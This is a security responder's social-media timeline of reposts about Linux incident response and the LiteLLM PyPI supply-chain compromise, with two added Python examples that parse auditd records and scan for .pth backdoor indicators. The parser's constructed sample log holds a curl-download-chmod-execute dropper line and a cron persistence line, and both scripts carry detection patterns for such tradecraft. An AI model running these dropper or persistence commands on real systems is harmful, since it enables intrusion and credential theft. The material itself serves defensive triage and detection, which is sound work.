Ahmet Payaslıoğlu (@Computeus7)
Senior Cyber Security Incident Responder | Threat Hunter
127.0.0.1 · Joined August 2018
1.7K posts · 930 Following · 488 Followers
Ahmet Payaslıoğlu reposted
Ridgeline Cyber (@RidgelineCyber):
Linux Incident Response (IR) gap Every SOC handles Linux servers. Most SOC analysts only know Windows forensics. When an incident hits a Linux host, the investigation stalls. Teams check auth.log for SSH brute force and stop there. Meanwhile, the attacker's systemd persistence service is running, their cron job re-downloads the implant every 15 minutes, and bash_history is empty because they ran "unset HISTFILE" as their first command. The evidence is in journald, auditd EXECVE records, and filesystem metadata that attackers can't fake without raw disk access. But you have to know where to look. We have built a Linux IR course that teaches the full investigation methodology — filesystem forensics, log analysis, memory forensics, container escape, and cloud lateral movement. The first 2 are free; no account needed. Training material: training.ridgelinecyber.com/courses/practi…
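The post above says the evidence of a Linux intrusion sits in auditd EXECVE records rather than in bash history. Below is an added worked example, written for this page and not part of Ridgeline Cyber's material: it reassembles EXECVE records (including the hex-encoded arguments auditd emits for values containing spaces or quotes, and the `aN[M]=` fragments the kernel uses for over-long arguments), joins each to its SYSCALL record by audit event id, and flags the re-download, chmod, systemd and cron patterns the post describes. The audit lines are constructed, 192.0.2.1 is a documentation address, and the flagging regexes are my own heuristics, not a vendor rule set.

```python
"""Added example: decode auditd EXECVE records and flag download-and-persist
tradecraft. Constructed sample data; heuristics are the author's assumption."""
import re
from collections import defaultdict


def _hx(s: str) -> str:
    """auditd hex-encodes an argument containing spaces, quotes or control
    characters and writes it unquoted; ordinary arguments are written quoted."""
    return s.encode().hex().upper()


# Constructed audit.log excerpt (not from a real incident). Event 5003 shows the
# a2[0]= / a2[1]= fragments the kernel emits for an over-long argument.
_DROPPER = ("curl -fsSL http://192.0.2.1:8080/update -o /tmp/.update "
            "&& chmod +x /tmp/.update && /tmp/.update")
_CRON = "(crontab -l; echo '*/15 * * * * /tmp/.update') | crontab -"
SAMPLE_AUDIT_LOG = f"""\
type=SYSCALL msg=audit(1711200000.101:5001): arch=c000003e syscall=59 success=yes exit=0 ppid=2311 pid=2340 auid=1000 uid=1000 gid=1000 comm="sh" exe="/usr/bin/dash" key="exec"
type=EXECVE msg=audit(1711200000.101:5001): argc=3 a0="sh" a1="-c" a2={_hx(_DROPPER)}
type=SYSCALL msg=audit(1711200000.205:5002): arch=c000003e syscall=59 success=yes exit=0 ppid=2311 pid=2341 auid=1000 uid=0 gid=0 comm="systemctl" exe="/usr/bin/systemctl" key="exec"
type=EXECVE msg=audit(1711200000.205:5002): argc=4 a0="systemctl" a1="enable" a2="--now" a3="sysmon.service"
type=SYSCALL msg=audit(1711200000.309:5003): arch=c000003e syscall=59 success=yes exit=0 ppid=2311 pid=2342 auid=1000 uid=1000 gid=1000 comm="sh" exe="/usr/bin/dash" key="exec"
type=EXECVE msg=audit(1711200000.309:5003): argc=3 a0="sh" a1="-c" a2[0]={_hx(_CRON[:20])} a2[1]={_hx(_CRON[20:])}
type=SYSCALL msg=audit(1711200000.412:5004): arch=c000003e syscall=59 success=yes exit=0 ppid=2311 pid=2343 auid=1000 uid=1000 gid=1000 comm="ls" exe="/usr/bin/ls" key="exec"
type=EXECVE msg=audit(1711200000.412:5004): argc=2 a0="ls" a1="-la"
"""

MSG_RE = re.compile(r"msg=audit\((\d+\.\d+):(\d+)\)")
# aN= or aN[M]= followed by either a quoted string or a bare hex blob.
ARG_RE = re.compile(r'\ba(\d+)(?:\[(\d+)\])?=(?:"([^"]*)"|([0-9A-Fa-f]+))')
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Heuristics (assumption): the tradecraft named in the post above.
PATTERNS = {
    "download_to_tmp": re.compile(r"\b(curl|wget)\b.*\s(/tmp|/dev/shm|/var/tmp)/"),
    "make_executable_tmp": re.compile(r"\bchmod\b.*\+x\s+(/tmp|/dev/shm|/var/tmp)/"),
    "systemd_enable": re.compile(r"\bsystemctl\b.*\benable\b"),
    "cron_install": re.compile(r"\bcrontab\b\s+-|/etc/cron"),
}


def parse_execve(log_text: str) -> list:
    """Group records by audit event id, rebuild argv in order (joining split
    fragments), and attach uid/exe from the SYSCALL record with the same id."""
    events = defaultdict(lambda: {"argv": {}, "uid": None, "exe": None})
    for line in log_text.splitlines():
        m = MSG_RE.search(line)
        if not m:
            continue
        ev = events[int(m.group(2))]
        if line.startswith("type=SYSCALL"):
            kv = dict(KV_RE.findall(line))
            ev["uid"] = kv.get("uid")
            ev["exe"] = kv.get("exe", "").strip('"')
        elif line.startswith("type=EXECVE"):
            for a in ARG_RE.finditer(line):
                idx, frag = int(a.group(1)), int(a.group(2) or 0)
                if a.group(3) is not None:
                    value = a.group(3)
                else:
                    value = bytes.fromhex(a.group(4)).decode("utf-8", "replace")
                ev["argv"].setdefault(idx, {})[frag] = value
    out = []
    for eid in sorted(events):
        ev = events[eid]
        if not ev["argv"]:
            continue  # SYSCALL without an EXECVE record: not an exec event
        argv = ["".join(v for _, v in sorted(frags.items()))
                for _, frags in sorted(ev["argv"].items())]
        out.append({"id": eid, "uid": ev["uid"], "exe": ev["exe"],
                    "argv": argv, "cmdline": " ".join(argv)})
    return out


def flag(event: dict) -> list:
    """Names of the heuristics matching the event's reconstructed command line."""
    return [name for name, rx in PATTERNS.items() if rx.search(event["cmdline"])]


if __name__ == "__main__":
    for ev in parse_execve(SAMPLE_AUDIT_LOG):
        print(f'{ev["id"]} uid={ev["uid"]} {flag(ev) or "-"} :: {ev["cmdline"]}')
```

Two caveats for anyone adapting this: the `-a exit,always -F arch=b64 -S execve -k exec` style rule that produces EXECVE records must already be loaded when the activity happens, and `unset HISTFILE` is a shell builtin, so it never reaches execve and will not appear in these records at all; the absence of history combined with the presence of the EXECVE trail is itself the finding.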
Ahmet Payaslıoğlu reposted
Joe Desimone (@dez_):
We open sourced the tool used to detect the Axios supply chain compromise! I built it Friday after a red eye home from RSAC. Also, wrote up the full story, including the hectic moments after that first critical alert github.com/elastic/supply…
Ahmet Payaslıoğlu reposted
vx-underground (@vxunderground):
Part of TeamPCP's success thus far has been the speed in which they operate.

tl;dr: teampcp doing lots of supply chains, exhausting, smash and grab passwords, runaway, really tiring

Generally speaking, large scale supply chain attacks are quiet, with the focus being silence and espionage. A notable example of this is the SOLARWINDS supply-chain attack, which was conducted by the Russian Federation. The goal is to discreetly insert malicious code into a product's update cycle. The payload would (under ideal circumstances) execute with specific triggers in place and BE QUIET. They don't want to set off any metaphorical alarms. You quietly watch and SLOWLY work.

TeamPCP (as of this writing) has focused on information exfiltration (stealing sensitive data, primarily credentials), which is more akin to a smash-and-grab rather than staying silent and watching what people are doing with their binoculars.

A successful supply chain attack can be a DFIR (Digital Forensics and Incident Response) nightmare. Many organizations do not have internal DFIR on staff, hence they consult with external entities. Suddenly, with a supply chain attack, you've got dozens of organizations contacting the same group of companies needing a forensic investigation launched. These DFIRs can take time with reporting, identifying victims, potential PII or sensitive documents stolen, cooperation with law enforcement and legal departments (or external law firms) ... it can take days, weeks, or (depending on the scope of impact and bureaucracy) months.

And then suddenly there is another supply chain attack ... and then another ... and then another ... and then another ... with a total of 50 as of this writing. The best I can describe what I'm currently seeing is a "DFIR resource exhaustion" technique.

If you've got only a handful of DFIR firms spread thin across a dozen or so companies and then ANOTHER supply chain attack happens AND THEN ANOTHER AND THEN ANOTHER, with some organizations potentially being hit multiple times, it's a nightmare come alive.

TeamPCP (as of what we've learned thus far) successfully used a supply chain attack to pivot to other supply chain attacks. They're chaining chains.

The concern now is they've performed 50 supply chain attacks in 8 days. Are there any more coming? Has any other vendor failed to rotate their security credentials correctly? Is any company not cooperating? What data was stolen? How many companies are even impacted? How many are unaware of what happened? How much user PII was stolen? How were these other supply chain attacks conducted?

The current prevailing theory is all of these supply chain attacks are the result of the initial Trivy supply chain attack; however (unironically) DFIR work must be conducted and more investigative work needs to be performed. It is dangerous to assert with high confidence that it is the result of the Trivy supply chain attack. If you're wrong, what if it's from something else we're not aware of yet? I'm sure not all details are public (yet). More information will come out eventually. This sort of DFIR work would take months, but now it's a race against the clock hoping another doesn't occur.

2026 starting off strong.
Ahmet Payaslıoğlu reposted
Rami McCarthy (@ramimacisabird):
😼New TeamPCP: PyPI package "telnyx" versions 4.87.1 and 4.87.2 contain malware. These versions were uploaded directly to PyPI (no matching GitHub tags/releases). Downgrade to 4.87.0 or earlier immediately. Windows payload appears broken in 4.87.1.
Ahmet Payaslıoğlu reposted
Aakash Gupta (@aakashgupta):
Someone just poisoned the Python package that manages AI API keys for NASA, Netflix, Stripe, and NVIDIA.. 97 million downloads a month.. and a simple pip install was enough to steal everything on your machine. The attacker picked the one package whose entire job is holding every AI credential in the organization in one place. OpenAI keys, Anthropic keys, Google keys, Amazon keys… all routed through one proxy. All compromised at once. The poisoned version was published straight to PyPI.. no code on GitHub.. no release tag.. no review. Just a file that Python runs automatically on startup. You didn't need to import it. You didn't need to call it. The malware fired the second the package existed on your machine. The attacker vibe coded it… the malware was so sloppy it crashed computers.. used so much RAM a developer noticed their machine dying and investigated. They found LiteLLM had been pulled in through a Cursor MCP plugin they didn't even know they had. That crash is the only reason thousands of companies aren't fully exfiltrated right now. If the code had been cleaner nobody notices for weeks. Maybe months. The attack chain is the part that gets worse every sentence. TeamPCP compromised Trivy first. A security scanning tool. On March 19. LiteLLM used Trivy in its own CI pipeline… so the credentials stolen from the SECURITY product were used to hijack the AI product that holds all your other credentials. Then they hit GitHub Actions. Then Docker Hub. Then npm. Then Open VSX. Five package ecosystems in two weeks. Each breach giving them the credentials to unlock the next one. The payload was three stages.. harvest every SSH key, cloud token, Kubernetes secret, crypto wallet, and .env file on the machine.. deploy privileged containers across every node in the cluster.. install a persistent backdoor waiting for new instructions. TeamPCP posted on Telegram after: "Many of your favourite security tools and open-source projects will be targeted in the months to come.. stay tuned." Every AI agent, copilot, and internal tool your company shipped this year runs on hundreds of packages exactly like this one… nobody chose to install LiteLLM on that developer's machine. It came in as a dependency of a dependency of a plugin. One compromised maintainer account turned the entire trust chain into a credential harvesting operation across thousands of production environments in hours. The companies deploying AI the fastest right now have the least visibility into what's underneath it.
Quoting Andrej Karpathy (@karpathy):

Software horror: litellm PyPI supply chain attack. Simple `pip install litellm` was enough to exfiltrate SSH keys, AWS/GCP/Azure creds, Kubernetes configs, git credentials, env vars (all your API keys), shell history, crypto wallets, SSL private keys, CI/CD secrets, database passwords. LiteLLM itself has 97 million downloads per month which is already terrible, but much worse, the contagion spreads to any project that depends on litellm. For example, if you did `pip install dspy` (which depended on litellm>=1.64.0), you'd also be pwnd. Same for any other large project that depended on litellm. Afaict the poisoned version was up for only less than ~1 hour. The attack had a bug which led to its discovery - Callum McMahon was using an MCP plugin inside Cursor that pulled in litellm as a transitive dependency. When litellm 1.82.8 installed, their machine ran out of RAM and crashed. So if the attacker didn't vibe code this attack it could have been undetected for many days or weeks. Supply chain attacks like this are basically the scariest thing imaginable in modern software. Every time you install any dependency you could be pulling in a poisoned package anywhere deep inside its entire dependency tree. This is especially risky with large projects that might have lots and lots of dependencies. The credentials that do get stolen in each attack can then be used to take over more accounts and compromise more packages. Classical software engineering would have you believe that dependencies are good (we're building pyramids from bricks), but imo this has to be re-evaluated, and it's why I've been so growingly averse to them, preferring to use LLMs to "yoink" functionality when it's simple enough and possible.
Ahmet Payaslıoğlu reposted
GoPlus Security 🚦 (@GoPlusSecurity):
⚠️ LiteLLM Supply Chain Poisoning Attack Analysis

LiteLLM is a widely used open-source Python library and proxy server in the AI ecosystem, with over 97M monthly downloads. It is commonly used to unify API calls across hundreds of LLMs. The attacker group TeamPCP took over the project's release pipeline and published malicious versions (1.82.7 and 1.82.8) to PyPI, embedding credential theft and backdoor functionality.

【1】Background and Attack Path

This is not an isolated incident, but part of a broader campaign by TeamPCP targeting "trusted security infrastructure". The attack chain is as follows.

Initial compromise (Trivy breach). Around March 19, the attackers compromised the GitHub Action of Aqua Security's vulnerability scanner Trivy.

Credential theft. LiteLLM used the compromised Trivy in its CI/CD pipeline for security scanning. During execution, the malicious Trivy Action successfully exfiltrated the PyPI publish token (PYPI_PUBLISH token) from the LiteLLM environment.

Malicious release. Using the stolen token, the attackers bypassed the project's GitHub release workflow and directly pushed malicious versions 1.82.7 and 1.82.8 to the PyPI repository on March 24.

【2】Attack Mechanism and Malicious Behavior

This attack demonstrates extremely high stealth and impact. The two malicious versions use different trigger mechanisms.

Trigger mechanism

Version 1.82.7 (stealth import trigger). Attackers injected obfuscated base64 malicious code into litellm/proxy/proxy_server.py. The payload is only activated when the LiteLLM proxy is explicitly executed, or when litellm.proxy is imported.

Version 1.82.8 (.pth hijacking trigger). Attackers introduced a relatively new attack vector in PyPI poisoning, Python startup hooks. A file named litellm_init.pth is placed in the site-packages directory. During Python initialization, the built-in site module automatically loads all .pth files and executes any line starting with import. As long as the malicious package is installed, any Python process on the system will trigger the payload, including running scripts, tests, or simply entering the Python interactive shell.

Note: The attack was discovered because the malicious process continuously spawned Python subprocesses, causing an infinite loop that led to memory exhaustion (fork bomb).

Malicious payload execution

Once triggered, the malicious script performs the following actions.

Stage 1: Data harvesting. The malware scans and collects high-value sensitive information on the host, including but not limited to cloud credentials (AWS, GCP, Azure) and Kubernetes tokens. It also collects .env files (which often contain AI API keys and database passwords), developer credentials such as ~/.ssh and ~/.gitconfig, and crypto wallets including Bitcoin, Ethereum, Monero, and Dogecoin configurations and private keys.

Stage 2: Encryption and exfiltration. All collected data is encrypted using 4096-bit RSA and AES-256-CBC, packaged into a tar archive, and exfiltrated via POST requests to attacker-controlled C2 domains such as models.litellm[.]cloud (and earlier checkmarx[.]zone).

Stage 3: Persistence. A persistent backdoor is written to ~/.config/sysmon/sysmon.py on Linux systems, and an accompanying systemd service is created to maintain long-term control. If a Kubernetes Service Account Token is found, the malware attempts to read all Secrets across namespaces in the cluster, and may even try to deploy a privileged Alpine Pod in the kube-system namespace to take over the entire node.

【3】Impact Scope

Direct victims include users who installed or updated LiteLLM via pip install litellm between March 24 08:30 UTC and 11:25 UTC without version pinning. Indirect victims include many AI Agent frameworks, MCP server components (such as Cursor-related plugins), and LLM orchestration tools that rely on LiteLLM as a dependency. If CI/CD pipelines or Docker image builds pulled the malicious versions due to lack of strict version pinning, production environments may be compromised.

【4】GoPlus Security Recommendations

If your systems were running AI-related Python environments during this period, take immediate action.

Risk investigation. Check all hosts, Docker images, and CI/CD pipelines to determine whether LiteLLM versions 1.82.7 or 1.82.8 were installed. You can verify using pip show litellm. Check for backdoor indicators such as litellm_init.pth, ~/.config/sysmon/sysmon.py, and any suspicious systemd services.

Containment and remediation. Immediately isolate infected machines or Kubernetes nodes. Do not rely on uninstalling the package. It is recommended to destroy affected containers or instances and rebuild them from scratch.

Credential rotation. Revoke and rotate all potentially exposed sensitive data, including API keys, access keys, and SSH keys.
Quoting solst/ICE of Astarte (@IceSolst): LiteLLM hack summary: What is it, why it's smart to target it, and how it happened (so far)
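The GoPlus post above (and the Aakash Gupta and Karpathy posts before it) describe the 1.82.8 trigger: site.py executes any `import` line it finds in a `.pth` file at interpreter start-up, so the payload fires without the package ever being imported. It also gives a short triage checklist (version check, `litellm_init.pth`, `~/.config/sysmon/sysmon.py`, a suspicious systemd unit). The block below is an added example written for this page, not GoPlus's, LiteLLM's or PyPI's code: it demonstrates the trigger with a harmless constructed `.pth` that only sets an environment variable, and implements the checklist as a read-only scanner. The version numbers and IOC paths are from the post; the suspicious-token list, the systemd unit directories searched and the sample `.pth` files are my assumptions.

```python
"""Added triage example for the LiteLLM 1.82.7/1.82.8 indicators in the post
above. Illustrative code for this page (not GoPlus's or LiteLLM's). Version
numbers and IOC paths come from the post; token heuristics, unit-file search
and the constructed .pth samples are assumptions."""
import os
import site
import tempfile
from importlib import metadata
from pathlib import Path

MALICIOUS_LITELLM = {"1.82.7", "1.82.8"}
IOC_PTH_NAME = "litellm_init.pth"
HOME = Path(os.path.expanduser("~"))
IOC_BACKDOOR = HOME / ".config" / "sysmon" / "sysmon.py"
# Assumed locations for the accompanying unit; the post does not name one.
UNIT_DIRS = [HOME / ".config" / "systemd" / "user", Path("/etc/systemd/system")]
# Heuristic (assumption): tokens rarely seen in legitimate .pth import lines.
SUSPICIOUS_TOKENS = ("base64", "exec(", "eval(", "subprocess", "os.system",
                     "urllib", "socket", "marshal", "zlib", "compile(")


def pth_exec_lines(pth_file: Path) -> list:
    """Lines that site.addpackage() will exec(): those starting with
    'import ' or 'import<TAB>'. Every other non-comment line is a path entry."""
    text = pth_file.read_text(encoding="utf-8", errors="replace")
    return [ln for ln in text.splitlines() if ln.startswith(("import ", "import\t"))]


def scan_pth_dir(directory: Path) -> list:
    """Read-only: parses .pth files, never imports or executes them."""
    findings = []
    if not directory.is_dir():
        return findings
    for pth in sorted(directory.glob("*.pth")):
        for line in pth_exec_lines(pth):
            flagged = pth.name == IOC_PTH_NAME or any(t in line for t in SUSPICIOUS_TOKENS)
            findings.append({"file": str(pth), "line": line, "flagged": flagged})
    return findings


def litellm_is_malicious(version) -> bool:
    return version in MALICIOUS_LITELLM


def installed_litellm_version():
    """Same information as `pip show litellm`, without shelling out."""
    try:
        return metadata.version("litellm")
    except metadata.PackageNotFoundError:
        return None


def suspicious_units() -> list:
    """Unit files whose contents reference the backdoor script name."""
    hits = []
    for d in UNIT_DIRS:
        if d.is_dir():
            for unit in d.glob("*.service"):
                try:
                    if "sysmon.py" in unit.read_text(errors="replace"):
                        hits.append(str(unit))
                except OSError:
                    pass
    return hits


def demo_pth_runs_on_startup() -> bool:
    """The trigger itself: a harmless constructed .pth whose import line sets
    an environment variable. site.addsitedir() is what site.py calls for each
    site-packages directory at start-up, i.e. the path litellm_init.pth used."""
    os.environ.pop("PTH_DEMO", None)
    with tempfile.TemporaryDirectory() as d:
        Path(d, "demo_hook.pth").write_text(
            'import os; os.environ["PTH_DEMO"] = "fired"\n', encoding="utf-8")
        site.addsitedir(d)
    return os.environ.get("PTH_DEMO") == "fired"


def scan_constructed_example() -> list:
    """Constructed sample dir: a setuptools-style hook (legitimate) next to a
    file carrying the IOC name with a placeholder line (read, never executed)."""
    with tempfile.TemporaryDirectory() as d:
        Path(d, "distutils-precedence.pth").write_text(
            "import os; var = 'SETUPTOOLS_USE_DISTUTILS'; "
            "enabled = os.environ.get(var, 'local') == 'local'\n", encoding="utf-8")
        Path(d, IOC_PTH_NAME).write_text(
            "import base64; print('placeholder, not the real payload')\n", encoding="utf-8")
        return scan_pth_dir(Path(d))


def triage_report() -> dict:
    """Live check of this interpreter's site-packages dirs and the host IOCs."""
    dirs = [Path(p) for p in getattr(site, "getsitepackages", lambda: [])()]
    dirs.append(Path(site.getusersitepackages()))
    version = installed_litellm_version()
    return {
        "litellm_version": version,
        "litellm_malicious": litellm_is_malicious(version),
        "backdoor_file": IOC_BACKDOOR.exists(),
        "suspicious_units": suspicious_units(),
        "pth_findings": [f for d in dirs for f in scan_pth_dir(d) if f["flagged"]],
    }


if __name__ == "__main__":
    print("import line in .pth executed by site.addsitedir():", demo_pth_runs_on_startup())
    for f in scan_constructed_example():
        print(("FLAG " if f["flagged"] else "ok   ") + f["file"] + " :: " + f["line"])
    print(triage_report())
```

Legitimate packages also ship `.pth` import hooks (setuptools' distutils-precedence.pth, virtualenv's _virtualenv.pth, editable installs), so every flagged line still has to be read by a human; the scanner only narrows the list. Run it from the same interpreter the suspect environment uses, and remember the post's own advice: a positive hit means rebuild, not `pip uninstall`.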
Ahmet Payaslıoğlu reposted
solst/ICE of Astarte (@IceSolst):
- XZ utils backdoor: found by guy debugging 200ms latency - LiteLLM hack: found by guy debugging oom issue These could have been the most impactful compromises ever. Forget security vendors, weaponize your engineers’ autism.
Ahmet Payaslıoğlu reposted
Anton (@Antonlovesdnb):
#ClaudeForBlueTeam - Day 9! Claude + tshark + Obsidian = analyzing PCAP like we're living in the future 😎 One prompt and your PCAP is analyzed and mapped to ATT&CK - all the tshark commands are included too, so you can sanity check Claude's work.
Ahmet Payaslıoğlu reposted
Justin Elze (@HackingLZ):
For those of you playing around at home with the LiteLLM supply chain stuff. Here are the decoded payloads and other info. github.com/HackingLZ/lite…
Ahmet Payaslıoğlu reposted
Justin Elze (@HackingLZ):
LiteLLM? Sysmon 🤣
Ahmet Payaslıoğlu reposted
Daniel Hnyk (@hnykda):
LiteLLM HAS BEEN COMPROMISED, DO NOT UPDATE. We just discovered that LiteLLM PyPI release 1.82.8 has been compromised: it contains litellm_init.pth with base64-encoded instructions to send all the credentials it can find to a remote server and self-replicate. Link below.
Ahmet Payaslıoğlu reposted
Andrej Karpathy (@karpathy):
(The "Software horror: litellm PyPI supply chain attack" post, quoted in full above under Aakash Gupta's repost.)
Quoting Daniel Hnyk (@hnykda): the "LiteLLM HAS BEEN COMPROMISED, DO NOT UPDATE" post reposted above.
Ahmet Payaslıoğlu reposted
mthcht (@mthcht2):
👁️ LOLC2 Collection of C2 frameworks abusing legitimate services to evade detection Major update: new projects tested, enriched data, and deeper insights. site: lolc2.github.io github: github.com/lolc2/lolc2.gi…
Ahmet Payaslıoğlu reposted
Virus Bulletin (@virusbtn):
Google Threat Intelligence Group, Lookout & iVerify have identified DarkSword - a new iOS full-chain exploit using multiple 0-days to fully compromise devices - that's been deployed by commercial surveillance vendors & suspected state-sponsored actors. cloud.google.com/blog/topics/th…
Ahmet Payaslıoğlu reposted
The DFIR Report (@TheDFIRReport):
Threat Actors are "Bringing Their Own Forensics" In a recent ClickFix campaign, we saw threat actors likely related to Interlock Ransomware, running Volatility (vol.py) directly on victim machines. Commonly a tool for defenders, the TAs are using it to:
Ahmet Payaslıoğlu reposted
ESET Research (@ESETresearch):
#ESETresearch analyzed more than 80 EDR killers, seen across real-world intrusions, and used ESET telemetry to document how these tools operate, who uses them, and how they evolve beyond simple driver abuse. welivesecurity.com/en/eset-resear… 1/6